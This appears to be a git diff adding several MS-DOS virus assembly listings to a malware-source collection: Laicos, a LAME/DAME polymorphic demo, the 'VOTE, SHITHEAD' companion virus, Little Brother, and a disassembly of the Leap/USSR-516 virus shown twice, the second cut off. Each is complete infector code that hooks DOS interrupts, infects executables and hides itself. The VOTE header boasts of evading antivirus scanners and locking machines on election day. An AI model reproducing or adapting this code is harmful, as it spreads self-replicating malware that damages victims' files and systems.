b/MSDOS/Virus.MSDOS.Unknown.laicos.asm @@ -0,0 +1,193 @@ +; ------------------------------------------------------------------------- ; +; Laicos v1.4 coded by KilJaeden of the Codebreakers 1998 ; +; ------------------------------------------------------------------------- ; +; Description: `-------------------| Started: 06/06/98 | Finished: 07/06/98 ; +; `-------------------^------------------- ; +; v1.0 - memory resident *.com overwritter, MCB style | Size: 283 ; +; v1.1 - makes sure it is really a .com file `---------- ; +; v1.2 - add infection of any file + restores attributes ; +; v1.3 - add time/date restoration of infected files ; +; v1.4 - add XOR,NOT,NEG,ROR encryption to this ; +; ------------------------------------------------------------------------- ; +; Thanks: To SPo0ky!! I Could not have done this without his patience!!!! ; +; ------------------------------------------------------------------------- ; +; to compile ::] tasm laicos.asm ; +; to link :::::] tlink /t laicos.obj ; +; ------------------------------------------------------------------------- ; + +code segment ; name our segment 'code' + assume cs:code,ds:code ; assign cs and ds to code + org 100h ; this be a .com file + .286 ; need this for pusha/popa + +start: jmp first ; jump to first (overwritten) + xor bp,bp ; XOR the value of bp to 0 + lea si,encd ; load SI with encrypted area start + mov di,si ; DI points there now too + call encr ; call the encryption routine + jmp encd ; jump to encrypted area + +encr: lodsb ; load a byte + not al ; encryptin 1 + ror al,4 ; encryptin 2 + neg al ; encryptin 3 +key: xor al,0 ; encryptin 4 + neg al ; unencrypt 3 + ror al,4 ; unencrypt 2 + not al ; unencrypt 1 + stosb ; put the byte back + loop encr ; do it for all bytes + ret ; return from call + +encd: mov ax,0deadh ; move 0deadh into AX + int 21h ; if resident, 0deadh is in BX now + cmp bx,0deadh ; are we resident? + jne go_rez ; nope were not, go rezident now + int 20h ; we are, terminate + +go_rez: sub word ptr cs:[2],80h ; lower top of memory data in PSP + mov ax,cs ; move CS into AX + dec ax ; decrement AX and + mov ds,ax ; move AX into DS + sub word ptr ds:[3],40h ; sub 1kb from accessed MCB + xor ax,ax ; ax to 0 + mov ds,ax ; DS has no value now + sub word ptr ds:[413h],2 ; adjust BIOS data area by 2kb + mov ax,word ptr ds:[413h] ; move adjusted BIOS mem to AX + mov cl,6 ; load cl with 6 + shl ax,cl ; multiply BIOS base mem by 64 + mov es,ax ; move the value into ES + push cs ; get cs again so you can + pop ds ; restore DS to original value + xor di,di ; DI must be 0 now + lea si,start ; load SI with start of virus + mov cx,finish-start ; # of bytes to write + rep movsb ; load the virus into memory + +hook: push es ; push the value in ES + pop ds ; pop it into DS + mov ax,3521h ; get the int 21h interrupt + int 21h ; get it now man! + mov word ptr ds:[oi21-100h],bx ; save the old one here + mov word ptr ds:[oi21+2-100h],es ; save it here too + mov ax,2521h ; point IVT to new ISR + lea dx,isr-100h ; load DX with start of ISR + int 21h ; IVT now points to new ISR + int 20h ; end now that we have hooked + +isr: pushf ; push all flags + cmp ax,0deadh ; have we added check value? + jne exec ; yup, wait for a 4bh + mov bx,0deadh ; nope, adding it now + popf ; pop the flags + iret ; pop cs:ip+flags from stack + +exec: pusha ; push all registers + push ds ; push value of DS + push es ; push ES as well + cmp ah,4bh ; something being executed? + je main ; yup, check if .com + jne exit ; nope, point to original ISR + +main: push ds ; push DS again + pop es ; and pop it into ES + mov di,dx ; move file name info to DI + mov cx,64 ; 64 byte file name possible + mov al,'.' ; load al with . + cld ; clear direction flag + repnz scasb ; scan until . is hit + cmp word ptr ds:[di],'OC' ; is it .CO- ? + jne exit ; not a .com file, exit + cmp word ptr ds:[di+2],'M' ; check for .--M + jne exit ; not a .com file, exit + + mov ax,4300h ; get the file attributes + int 21h ; we have them now + push cx ; save the values + push dx ; save the values + push ds ; save the values + + mov ax,4301h ; set file attributes + xor cx,cx ; to none at all + int 21h ; set them now + + mov ax,3d02h ; open the file then + int 21h ; file is now open + xchg ax,bx ; save the file info + + push cs ; push 100h + push cs ; push it again + pop ds ; into DS + pop es ; into ES + + mov ax,5700h ; get time / date stamps + int 21h ; we have the stamps now + push dx ; save the time + push cx ; save the date + + in al,40h ; get random value + mov byte ptr cs:[key-100h+1],al ; save as our key + + mov ah,40h ; write to file + lea dx,start-100h ; load start address + mov cx,encd-start ; # of bytes to write + int 21h ; write them now + + mov bp,100h ; load bp with 100h + lea di,finish-100h ; end of encrypted stuff + lea si,encd-100h ; start of encrypted stuff + mov cx,finish-encd ; # of bytes to encrypt + cld ; clear direction flag + call encr ; call the encryption routine + + mov ah,40h ; write to file + mov cx,finish-encd ; total # of bytes to write + lea dx,finish-100h ; write from here + int 21h ; write them now + + mov ax,5701h ; restore time / date + pop cx ; from this value + pop dx ; and from this value + int 21h ; restore them now + + mov ax,4301h ; set file attributes + pop ds ; restore from saved value + pop dx ; restore from this one too + pop cx ; and lastely, this one + int 21h ; attributes are restored + + mov ah,3eh ; close the file + int 21h ; it's closed + +exit: pop es ; pop ES from stack + pop ds ; pop DS from stack + popa ; pop all registers + popf ; pop all flags + db 0eah ; jump to original ISR + +; --------------------------( The Data Area ) ----------------------------- ; +; ------------------------------------------------------------------------- ; + + oi21 dd ? ; old int 21 is here + finish label near ; the offset label + +; ---------------------( Not Saved / Not Encrypted )----------------------- ; +; ------------------------------------------------------------------------- ; + +first: lea di,start ; load with start address + lea si,new ; overwrite with these bytes + movsw ; overwrite two bytes + movsb ; overwrite one byte + jmp encd ; jump to encrypted area start + +new: mov cx,finish-encd ; this will overwrite the jump + +; ----------------------------( Its All Over )----------------------------- ; +; ------------------------------------------------------------------------- ; + + code ends ; end code segment + end start ; end / where to start + +; ------------------------------------------------------------------------- ; +; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ; +; ------------------------------------------------------------------------- ; diff --git a/MSDOS/Virus.MSDOS.Unknown.lame.asm b/MSDOS/Virus.MSDOS.Unknown.lame.asm new file mode 100644 index 00000000..9c685e51 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lame.asm @@ -0,0 +1,186 @@ + .code + .radix 16 + org 100 + +start: jmp temp ; The next two lines will be patched in +; cld ; DAME may have altered DF +; mov bx,ds + call calc_off + +old4 dw 20cdh, 0 +fmask db '*.com',0 +dmask db '..',0 + + db 0dh,'This is a lame virus slapped together by DA/PS',0Dh,0A + db 'To demonstrate DAME 0.91',0Dh,0A,1a + +vars = 0 + include dame.asm ; include the code portion of DAME + +calc_off: + pop si + mov ax,si + mov cl,4 + shr ax,cl + sub ax,10 + add ax,bx + mov bx,offset enter_vir + push ax bx + retf + +enter_vir: + mov di,100 + push es di es es + movsw + movsw +enter_vir0: + push cs cs + pop es ds + mov ah,1a + mov dx,offset new_dta ; set new DTA + int 21 + + mov ah,47 + cwd + mov si,offset old_path+1 + mov byte ptr [si-1],'\' + int 21 + + mov inf_cnt,4 + + call rnd_init_seed +inf_dir:mov ah,4e + mov dx,offset fmask +fnext: int 21 + jnc inf_file + + mov ah,3bh + mov dx,offset dmask + int 21 + jnc inf_dir +done_all: + mov ah,3bh + mov dx,offset old_path + int 21 + + pop es ds ; restore the DTA + mov dx,80 + mov ah,1a + int 21 + + retf ; return to carrier + +inf_file: + mov ax,3d00 + mov dx,offset new_dta + 1e + int 21 + jc _fnext + xchg ax,bx + + mov ah,3f + mov cx,4 + mov dx,offset old4 + int 21 + + mov ah,3e + int 21 + + cmp old4,0e9fc + jz _fnext + add al,ah + cmp al,'Z'+'M' + jz _fnext + call infect + dec inf_cnt + jz done_all +_fnext: + mov ah,4f + jmp short fnext + +infect: mov ax,3d00 + mov dx,offset new_dta + 1e + int 21 + push ax + xchg ax,bx + + mov ax,1220 + int 2f + + mov ax,1216 + mov bl,es:di + mov bh,0 + int 2f + + pop bx + + mov word ptr es:[di+2],2 + + mov ax,es:[di+11] + mov bp,ax + mov cx,4 + sub ax,cx + mov patch,ax + + mov ah,40 + mov dx,offset oFCE9 + int 21 + + mov word ptr es:[di+15],bp + + push es di cs + pop es + + mov si,100 + mov di,offset copyvirus + mov cx,(heap - start + 1)/2 + rep movsw + + mov ax,0000000000001011b + mov dx,offset copyvirus + mov cx,heap - start + mov si,offset _decryptbuffer + mov di,offset _encryptbuffer + push dx bx si + mov bx,bp + inc bh + call dame + + mov ah,40 + pop dx bx + int 21 + + mov ah,40 + mov cx,heap - start + pop dx + int 21 + + pop di es + or byte ptr es:[di+6],40 + + mov ah,3e + int 21 + + retn + +oFCE9 dw 0e9fc +heap: +patch dw ? +inf_cnt db ? + +vars = 1 + include dame.asm ; include the heap portion of DAME + +old_path db 41 dup (?) +new_dta db 2c dup (?) +_encryptbuffer: db 80 dup (?) +_decryptbuffer: db 1a0 dup (?) +copyvirus db heap - start + 20 dup (?) + +temp: mov byte ptr ds:[100],0fc + mov word ptr ds:[101],0db8c + xor di,di + push cs di cs cs + jmp enter_vir0 + + end start +--End LAME.ASM--Begin DAME.ASM------------------------------------------------- diff --git a/MSDOS/Virus.MSDOS.Unknown.lb-349.asm b/MSDOS/Virus.MSDOS.Unknown.lb-349.asm new file mode 100644 index 00000000..a07c2240 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lb-349.asm @@ -0,0 +1,319 @@ +;**************************************************************************** +;* VOTE, SHITHEAD! virus Edited by URNST KOUCH for the Crypt Newsletter 7. +;* +;* TASM/MASM compatible source listing +;* +;* VOTE, SHITHEAD is a resident, companion virus based upon Little +;* Brother code and library .asm routines extracted from Nowhere Man's VCL. +;* It is also 'patched' with three 'nops' (they are commented) which +;* effectively blind a number of a-v scanners. This simple alteration +;* demonstrates a practical benefit of source code possession: quick +;* generation of different virus strains becomes a task within anyone's +;* reach. The only tools needed are a number of virus scanners and patience. +;* +;* In any case, the VOTE virus is just the ideal sample needed for +;* judicious virus action. It is a PERFECT tool for viral spreading for +;* a number of reasons. First, it is a FAST infector. Once resident +;* VOTE will create a companion file for ANY .EXE executed on ANY drive +;* and it will do it so quickly that most users, even suspicious ones, +;* will not notice any slowdown or glitches in machine operation. +;* Second, 'companion-ed' .EXE's will continue to load and function +;* properly when VOTE is resident. At the start of the day's computing, +;* the first 'companion-ed' .EXE executed will misfire ONCE as the virus +;* becomes resident. If it is re-called it will function perfectly. +;* Third, VOTE like the INSUFF viruses in the last newsletter strikes +;* directly at anti-virus suites vulnerable to 'spawning' infections (many +;* no-names, CPAV, NAV) and creates 'hidden' companion files, an improvement +;* over the original virus's modus operandi which left them out in plane +;* sight in the directory. Last, VOTE is very small. In RAM, it is not +;* discernible, taking up slightly less that 0.25k. Characteristically, +;* this is NOT reported by a mem /c display. In fact, +;* VOTE is almost invisible to any number of standard diagnostic +;* tests. Memory maps by QEMM and Norton's SYSINFO will +;* report INT 21 hooked differently. But unless the user can compare +;* an uncontaminated INTERRUPT report with one when the virus IS present, +;* it's unlikely he'll know anything is different. Even then, VOTE is hard +;* to notice. +;* +;* On election day, November 3rd, VOTE will lock an infected machine into +;* a loop as it displays a "DID YOU VOTE, SHITHEAD??" query repetitively +;* across the monitor. Computing will be impossible on Nov. 3rd +;* unless VOTE is removed from the machine, a task accomplished by unmasking +;* all the hidden .COMfiles and deleting them while +;* the virus is NOT resident. At all other times, VOTE is almost completely +;* transparent. +;**************************************************************************** + +code segment + assume cs:code,ds:code,es:nothing + + .RADIX 16 + + +oi21 equ endit +nameptr equ endit+4 +DTA equ endit+8 + + +;**************************************************************************** +;* Check for activation date, then proceed to installation! +;**************************************************************************** + + org 100h + +begin: + call get_day ; Get the day, DOS time/date grab + cmp ax,0003h ; Did the function return the 3rd? + jne realstrt ; If equal, continue along stream + call get_month ; Get the month, DOS time/date grab + cmp ax,000Bh ; Did the function return November (11)? + jne realstrt ; If equal, continue to blooie; if not + ; skip to loading of virus + + +blooie: mov dx, offset shithead ;load 'shithead' message + mov ah,9 ;display it and loop + int 21h ;endlessly until + jmp blooie ;user becomes ill and reboots + +realstrt: mov ax,0044h ;move VOTE SHITHEAD to empty hole in RAM + nop ;a 'nop' to confuse tbSCAN + mov es,ax + nop ;a 'nop' to confuse Datatechnik's AVscan + mov di,0100h + mov si,di + mov cx,endit - begin ;length of SHITHEAD into cx + rep movsb + + mov ds,cx ;get original int21 vector + mov si,0084h + mov di,offset oi21 + mov dx,offset ni21 + lodsw + cmp ax,dx ;check to see if virus is around + je cancel ; by comparing new interrupt (ni21) + stosw ; vector to current, if it looks + movsw ; the same 'cancel' operation + + push es ;set vector to new handler + pop ds + mov ax,2521h + int 21h + +cancel: ret + + +;**************************************************************************** +;* File-extension masks for checking and naming routines;message text +;**************************************************************************** + +EXE_txt db 'EXE',0 +COM_txt db 'COM',0 +SHITHEAD db "DID YOU VOTE, SHITHEAD??" + db 07h,07h,'$' + +;**************************************************************************** +;* Interrupt handler 24 +;**************************************************************************** + +ni24: mov al,03 ;virus critical error handler + iret ;prevents embarrassing messages + ;on attempted writes to protected disks + +;**************************************************************************** +;* Interrupt handler 21 +;**************************************************************************** + +ni21: pushf + + push es + push ds + push ax + push bx + push dx + + cmp ax,4B00h ;now that we're installed + jne exit ; check for 4B00, DOS excutions + +doit: call infect ; if one comes by, grab it + +exit: pop dx ; if anything else, goto sleep + pop bx + pop ax + pop ds + pop es + popf + + jmp dword ptr cs:[oi21] ;call to old int-handler + + +;**************************************************************************** +;* Try to infect a file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + mov word ptr cs:[nameptr],dx ;save the ptr to the filename + mov word ptr cs:[nameptr+2],ds + + mov ah,2Fh ;get old DTA + int 21 + push es + push bx + + push cs ;set new DTA + + pop ds + mov dx,offset DTA + mov ah,1Ah + int 21 + + call searchpoint ; here's where we grab a name + push di ; for ourselves + mov si,offset COM_txt ;is extension 'COM'? + + mov cx,3 + rep cmpsb + pop di + jz do_com ;if so, go to our .COM routine + + mov si,offset EXE_txt ;is extension 'EXE'? + nop ;'nop' to confuse SCAN v95b. + mov cl,3 + rep cmpsb + jnz return + +do_exe: mov si,offset COM_txt ;change extension to COM + nop ;another 'nop' to confuse SCAN + call change_ext + + mov ax,3300h ;get ctrl-break flag + nop + int 21 + push dx + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + push cs ;set int24 vector to new handler + pop ds ;virus handles machine + mov dx,offset ni24 ;exits on attempted writes + mov ah,25h ;to write-protected disks + push ax + int 21 + + lds dx,dword ptr [nameptr] ;create the virus (with name of .EXE target) + mov ah,03Ch ; DOS create file function + mov cx,00100111b ; CX holds file attributes (all) + int 021h ; makes it hidden/system/read-only + ; do it + xchg bx,ax ;save handle + + push cs + pop ds + mov cx,endit - begin ; write the virus to the created file + mov dx,offset begin ; CX contains length + mov ah,40h ; write to file function + int 21 + + mov ah,3Eh ;close the file + int 21 + + +return1: pop ax ;restore int24 vector + pop ds + pop dx + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + mov si,offset EXE_txt ;change extension to EXE + call change_ext ;execute EXE-file + +return: mov ah,1Ah ;restore old DTA + pop dx + pop ds + int 21 + + ret + +do_com: call findfirst ;is the COM-file a virus? + cmp word ptr cs:[DTA+1Ah],endit - begin ;compare it to virus length + jne return ;no, so execute COM-file + mov si,offset EXE_txt ;does the EXE-variant exist? + call change_ext + call findfirst + jnc return ;yes, execute EXE-file + mov si,offset COM_txt ;change extension to COM + call change_ext + jmp short return ;execute COM-file + +;**************************************************************************** +;* Search beginning of extension for name we will usurp +;**************************************************************************** + +searchpoint: les di,dword ptr cs:[nameptr] + mov ch,0FFh + mov al,0 + repnz scasb + sub di,4 + ret + +;**************************************************************************** +;* Change the extension of the filename (CS:SI -> ext) +;**************************************************************************** + +change_ext: call searchpoint + push cs + pop ds + movsw + movsw + ret + + + +;**************************************************************************** +;* Find the file +;**************************************************************************** + +findfirst: lds dx,dword ptr [nameptr] + mov cl,27h + mov ah,4Eh + int 21 + ret + +;**************************************************************************** +;* Get the day off the system for activation checking +;**************************************************************************** +get_day: + mov ah,02Ah ; DOS get date function + int 021h + mov al,dl ; Copy day into AL + cbw ; Sign-extend AL into AX + ret ; Get back to caller +;************************************************************************* +;* Get the month off the system for activation checking +;************************************************************************* + +get_month: + mov ah,02Ah ; DOS get date function + int 021h + mov al,dh ; Copy month into AL + cbw ; Sign-extend AL into AX + ret ; Get back to caller + + +endit: + +code ends + end begin + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lbrother.asm b/MSDOS/Virus.MSDOS.Unknown.lbrother.asm new file mode 100644 index 00000000..ba4ec960 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lbrother.asm @@ -0,0 +1,242 @@ +;**************************************************************************** +;* Little Brother Version 1 +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + org 100h + +FILELEN equ end - begin +RESPAR equ (FILELEN/16) + 17 +VERSION equ 1 +oi21 equ end +nameptr equ end+4 +DTA equ end+8 + + .RADIX 16 + + +;**************************************************************************** +;* Start the program! +;**************************************************************************** + +begin: cld + + mov ax,0DEDEh ;already installed? + int 21h + cmp ah,041h + je cancel + + mov ax,0044h ;move program to empty hole + mov es,ax + mov di,0100h + mov si,di + mov cx,FILELEN + rep movsb + + mov ds,cx ;get original int21 vector + mov si,0084h + mov di,offset oi21 + movsw + movsw + + push es ;set vector to new handler + pop ds + mov dx,offset ni21 + mov ax,2521h + int 21h + +cancel: ret + + +;**************************************************************************** +;* File-extensions +;**************************************************************************** + +EXE_txt db 'EXE',0 +COM_txt db 'COM',0 + + +;**************************************************************************** +;* Interupt handler 24 +;**************************************************************************** + +ni24: mov al,03 + iret + + +;**************************************************************************** +;* Interupt handler 21 +;**************************************************************************** + +ni21: pushf + + cmp ax,0DEDEh ;install-check ? + je do_DEDE + + push dx + push bx + push ax + push ds + push es + + cmp ax,4B00h ;execute ? + jne exit + +doit: call infect + +exit: pop es + pop ds + pop ax + pop bx + pop dx + popf + + jmp dword ptr cs:[oi21] ;call to old int-handler + +do_DEDE: mov ax,04100h+VERSION ;return a signature + popf + iret + + +;**************************************************************************** +;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + mov word ptr cs:[nameptr],dx ;save the ptr to the filename + mov word ptr cs:[nameptr+2],ds + + push cs ;set new DTA + pop ds + mov dx,offset DTA + mov ah,1Ah + int 21 + + call searchpoint + mov si,offset EXE_txt ;is extension 'EXE'? + mov cx,3 + rep cmpsb + jnz do_com + +do_exe: mov si,offset COM_txt ;change extension to COM + call change_ext + + mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + xor dl,dl ;clear the flag + mov ax,3301h + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + push cs ;set int24 vec to new handler + pop ds + mov dx,offset ni24 + mov ax,2524h + int 21 + + lds dx,dword ptr [nameptr] ;create the file (unique name) + xor cx,cx + mov ah,5Bh + int 21 + jc return1 + xchg bx,ax ;save handle + + push cs + pop ds + mov cx,FILELEN ;write the file + mov dx,offset begin + mov ah,40h + int 21 + cmp ax,cx + pushf + + mov ah,3Eh ;close the file + int 21 + + popf + jz return1 ;all bytes written? + + lds dx,dword ptr [nameptr] ;delete the file + mov ah,41h + int 21 + +return1: pop ds ;restore int24 vector + pop dx + mov ax,2524h + int 21 + + pop dx ;restore ctrl-break flag + mov ax,3301h + int 21 + + mov si,offset EXE_txt ;change extension to EXE + call change_ext + +return: ret + +do_com: call findfirst ;is the file a virus? + cmp word ptr cs:[DTA+1Ah],FILELEN + jne return + mov si,offset EXE_txt ;does the EXE-variant exist? + call change_ext + call findfirst + jnc return + mov si,offset COM_txt ;change extension to COM + jmp short change_ext + + +;**************************************************************************** +;* Find the file +;**************************************************************************** + +findfirst: lds dx,dword ptr [nameptr] + mov cl,27h + mov ah,4Eh + int 21 + ret + + +;**************************************************************************** +;* change the extension of the filename (CS:SI -> ext) +;**************************************************************************** + +change_ext: call searchpoint + push cs + pop ds + movsw + movsw + ret + + +;**************************************************************************** +;* search begin of extension +;**************************************************************************** + +searchpoint: les di,dword ptr cs:[nameptr] + mov ch,0FFh + mov al,'.' + repnz scasb + ret + + +;**************************************************************************** +;* Text and Signature +;**************************************************************************** + + db 'Little Brother',0 + +end: + +cseg ends + end begin + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.leap.asm b/MSDOS/Virus.MSDOS.Unknown.leap.asm new file mode 100644 index 00000000..70a16bf9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.leap.asm @@ -0,0 +1,280 @@ + +ussr516 segment byte public + assume cs:ussr516, ds:ussr516 + org 100h +;Disassembled by Dark Angel of PHALCON/SKISM +;for 40Hex Number 7 Volume 2 Issue 3 +stub: db 0e9h, 0, 0 + db 0e9h, 1, 0, 0 +;This is where the virus really begins +start: + push ax + call beginvir + +orig4 db 0cdh, 20h, 0, 0 +int30store db 0, 0, 0, 0 ;Actually it's int 21h + ;entry point +int21store db 0, 0, 0, 0 + +beginvir: pop bp ;BP -> orig4 + mov si,bp + mov di,103h + add di,[di-2] ;DI -> orig4 + movsw ;restore original + movsw ;4 bytes of program + xor si,si + mov ds,si + les di,dword ptr ds:[21h*4] + mov [bp+8],di ;int21store + mov [bp+0Ah],es + lds di,dword ptr ds:[30h*4+1] ;Bug???? +findmarker: + inc di + cmp word ptr [di-2],0E18Ah ;Find marker bytes + jne findmarker ;to the entry point + mov [bp+4],di ;and move to + mov [bp+6],ds ;int30store + mov ax,5252h ;Get list of lists + int 21h ;and also ID check + + add bx,12h ;Already installed? + jz quitvir ;then exit + push bx + mov ah,30h ;Get DOS version + int 21h + + pop bx ;bx = 12, ptr to 1st + ;disk buffer + cmp al,3 + je handlebuffer ;if DOS 3 + ja handleDBHCH ;if > DOS 3 + inc bx ;DOS 2.X, offset is 13 +handlebuffer: + push ds + push bx + lds bx,dword ptr [bx] ;Get seg:off of buffer + inc si + pop di + pop es ;ES:DI->seg:off buff + mov ax,[bx] ;ptr to next buffer + cmp ax,0FFFFh ;least recently used? + jne handlebuffer ;if not, go find it + cmp si,3 + jbe quitvir + stosw + stosw + jmp short movetobuffer +handleDBHCH: ;Disk Buffer Hash Chain Head array + lds si,dword ptr [bx] ;ptr to disk buffer + lodsw ;info + lodsw ;seg of disk buffer + ;hash chain head array + inc ax ;second entry + mov ds,ax + xor bx,bx + mov si,bx + lodsw ;EMS page, -1 if not + ;in EMS + xchg ax,di ;save in di + lodsw ;ptr to least recently + ;used buffer + mov [di+2],ax ;change disk buffer + ;backward offset to + ;least recently used + xchg ax,di ;restore EMS page + mov [di],ax ;set to least recently +movetobuffer: ;used + mov di,bx + push ds + pop es ;ES:DI -> disk buffer + push cs + pop ds + mov cx,108h + lea si,[bp-4] ;Copy from start + rep movsw + mov ds,cx ;DS -> interrupt table + mov word ptr ds:[4*21h],0BCh ;New interrupt handler + mov word ptr ds:[4*21h+2],es ;at int21 +quitvir: + push cs ;CS = DS = ES + pop es + push es + pop ds + pop ax + mov bx,ax + mov si, 100h ;set up stack for + push si ;the return to the + retn ;original program +int24: + mov al,3 ;Ignore all errors + iret +tickstore db 3 ;Why??? +buffer db 3, 0, 9, 0 + +int21: + pushf + cli ;CP/M style call entry + call dword ptr cs:[int30store-start] + retn ;point of int 21h + +int21DSDX: ;For int 21h calls + push ds ;with + lds dx,dword ptr [bp+2] ;DS:DX -> filename + call int21 + pop ds + retn + + cmp ax,4B00h ;Execute + je Execute + cmp ax,5252h ;ID check + je CheckID + cmp ah,30h ;DOS Version + je DosVersion +callorig21: ;Do other calls + jmp dword ptr cs:[int21store-start] +DosVersion: ;Why????? ;DOS Version + dec byte ptr cs:[tickstore-start] + jnz callorig21 ;Continue if not 0 + push es + xor ax,ax + push ax + mov es,ax + mov al,es:[46Ch] ; 40h:6Ch = Timer ticks + ; since midnight + and al,7 ; MOD 15 + inc ax + inc ax + mov cs:[tickstore-start],al ;# 2-17 + pop ax + pop es + iret +CheckID: ;ID Check + mov bx,0FFEEh ;FFEEh = -12h + iret +Execute: ;Execute + push ax ;Save registers + push cx + push es + push bx + push ds ;DS:DX -> filename + push dx ;save it on stack + push bp + mov bp,sp ;Set up stack frame + sub sp,0Ah ;Temporary variables + ;[bp-A] = attributes + ;[bp-8] = int 24 off + ;[bp-6] = int 24 seg + ;[bp-4] = file time + ;[bp-2] = file date + sti + push cs + pop ds + mov ax,3301h ;Turn off ^C check + xor dl,dl ;(never turn it back + call int21 ; on. Bug???) + mov ax,3524h ;Get int 24h + call int21 ;(Critical error) + mov [bp-8],bx + mov [bp-6],es + mov dx,int24-start + mov ax,2524h ;Set to new one + call int21 + mov ax,4300h ;Get attributes + call int21DSDX + jnc continue +doneinfect: + mov ax,2524h ;Restore crit error + lds dx,dword ptr [bp-8] ;handler + call int21 + cli + mov sp,bp + pop bp + pop dx + pop ds + pop bx + pop es + pop cx + pop ax + jmp short callorig21 ;Call orig handler +continue: + mov [bp-0Ah],cx ;Save attributes + test cl,1 ;Check if r/o???? + jz noclearattr + xor cx,cx + mov ax,4301h ;Clear attributes + call int21DSDX ;Filename in DS:DX + jc doneinfect ;Quit on error +noclearattr: + mov ax,3D02h ;Open read/write + call int21DSDX ;Filename in DS:DX + jc doneinfect ;Exit if error + mov bx,ax + mov ax,5700h ;Save time/date + call int21 + mov [bp-4],cx + mov [bp-2],dx + mov dx,buffer-start + mov cx,4 + mov ah,3Fh ;Read 4 bytes to + call int21 ;buffer + jc quitinf + cmp byte ptr ds:[buffer-start],0E9h;Must start with 0E9h + jne quitinf ;Otherwise, quit + mov dx,word ptr ds:[buffer+1-start];dx = jmploc + dec dx + xor cx,cx + mov ax,4201h ;go there + call int21 + mov ds:[buffer-start],ax ;new location offset + mov dx,orig4-start + mov cx,4 + mov ah,3Fh ;Read 4 bytes there + call int21 + mov dx,ds:[orig4-start] + cmp dl,0E9h ;0E9h means we might + jne infect ;already be there + mov ax,ds:[orig4+2-start] ;continue checking + add al,dh ;to see if we really + sub al,ah ;are there. + jz quitinf +infect: + xor cx,cx + mov dx,cx + mov ax,4202h ;Go to EOF + call int21 + mov ds:[buffer+2-start],ax ;save filesize + mov cx,204h + mov ah,40h ;Write virus + call int21 + jc quitinf ;Exit if error + sub cx,ax + jnz quitinf + mov dx,ds:[buffer-start] + mov ax,ds:[buffer+2-start] + sub ax,dx + sub ax,3 ;AX->jmp offset + mov word ptr ds:[buffer+1-start],ax;Set up buffer + mov byte ptr ds:[buffer-start],0E9h;code the jmp + add al,ah + mov byte ptr ds:[buffer+3-start],al + mov ax,4200h ;Rewind to jmploc + call int21 + mov dx, buffer-start + mov cx,4 ;Write in the jmp + mov ah,40h + call int21 +quitinf: + mov cx,[bp-4] + mov dx,[bp-2] + mov ax,5701h ;Restore date/time + call int21 + mov ah,3Eh ;Close file + call int21 + mov cx,[bp-0Ah] ;Restore attributes + mov ax,4301h + call int21DSDX + jmp doneinfect ;Return +ussr516 ends + end stub + + diff --git a/MSDOS/Virus.MSDOS.Unknown.leap_frg.asm b/MSDOS/Virus.MSDOS.Unknown.leap_frg.asm new file mode 100644 index 00000000..8638e789 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.leap_frg.asm @@ -0,0 +1,278 @@ + +ussr516 segment byte public + assume cs:ussr516, ds:ussr516 + org 100h +; Disassembled by Dark Angel of PHALCON/SKISM +; for 40Hex Number 7 Volume 2 Issue 3 +stub: db 0e9h, 0, 0 + db 0e9h, 1, 0, 0 +; This is where the virus really begins +start: + push ax + call beginvir + +orig4 db 0cdh, 20h, 0, 0 +int30store db 0, 0, 0, 0 ; Actually it's int 21h + ; entry point +int21store db 0, 0, 0, 0 + +beginvir: pop bp ; BP -> orig4 + mov si,bp + mov di,103h + add di,[di-2] ; DI -> orig4 + movsw ; restore original + movsw ; 4 bytes of program + xor si,si + mov ds,si + les di,dword ptr ds:[21h*4] + mov [bp+8],di ; int21store + mov [bp+0Ah],es + lds di,dword ptr ds:[30h*4+1] ; Bug???? +findmarker: + inc di + cmp word ptr [di-2],0E18Ah ; Find marker bytes + jne findmarker ; to the entry point + mov [bp+4],di ; and move to + mov [bp+6],ds ; int30store + mov ax,5252h ; Get list of lists + int 21h ; and also ID check + + add bx,12h ; Already installed? + jz quitvir ; then exit + push bx + mov ah,30h ; Get DOS version + int 21h + + pop bx ; bx = 12, ptr to 1st + ; disk buffer + cmp al,3 + je handlebuffer ; if DOS 3 + ja handleDBHCH ; if > DOS 3 + inc bx ; DOS 2.X, offset is 13 +handlebuffer: + push ds + push bx + lds bx,dword ptr [bx] ; Get seg:off of buffer + inc si + pop di + pop es ; ES:DI->seg:off buff + mov ax,[bx] ; ptr to next buffer + cmp ax,0FFFFh ; least recently used? + jne handlebuffer ; if not, go find it + cmp si,3 + jbe quitvir + stosw + stosw + jmp short movetobuffer +handleDBHCH: ; Disk Buffer Hash Chain Head array + lds si,dword ptr [bx] ; ptr to disk buffer + lodsw ; info + lodsw ; seg of disk buffer + ; hash chain head array + inc ax ; second entry + mov ds,ax + xor bx,bx + mov si,bx + lodsw ; EMS page, -1 if not + ; in EMS + xchg ax,di ; save in di + lodsw ; ptr to least recently + ; used buffer + mov [di+2],ax ; change disk buffer + ; backward offset to + ; least recently used + xchg ax,di ; restore EMS page + mov [di],ax ; set to least recently +movetobuffer: ; used + mov di,bx + push ds + pop es ; ES:DI -> disk buffer + push cs + pop ds + mov cx,108h + lea si,[bp-4] ; Copy from start + rep movsw + mov ds,cx ; DS -> interrupt table + mov word ptr ds:[4*21h],0BCh ; New interrupt handler + mov word ptr ds:[4*21h+2],es ; at int21 +quitvir: + push cs ; CS = DS = ES + pop es + push es + pop ds + pop ax + mov bx,ax + mov si, 100h ; set up stack for + push si ; the return to the + retn ; original program +int24: + mov al,3 ; Ignore all errors + iret +tickstore db 3 ; Why??? +buffer db 3, 0, 9, 0 + +int21: + pushf + cli ; CP/M style call entry + call dword ptr cs:[int30store-start] + retn ; point of int 21h + 